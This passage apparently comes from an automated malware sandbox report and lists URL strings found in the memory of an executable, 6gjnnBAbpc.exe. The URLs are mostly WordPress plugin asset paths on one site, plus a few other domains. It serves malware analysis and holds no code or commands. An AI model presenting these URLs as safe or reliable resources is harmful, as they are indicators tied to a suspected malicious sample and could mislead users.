00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/register/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.425321853.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://new.nelipak.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pcgrate.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.10.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.10.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ve
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.10.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.10
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.11
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.11.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.40
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/js/ooohboi-steroids.js?
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/flipbook.style.css?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/font-awesome.css?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/embed.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.book3.min.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.min.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.swipe.min.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.webgl.min.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/iscroll.min.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/pdf.min.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/three.min.js?ver=3.25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/tfc-product-catalog/tfc-product-catalog.js?ver=1.0.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/css.css?ver=2.1.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/js.js?ver=2.1.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0
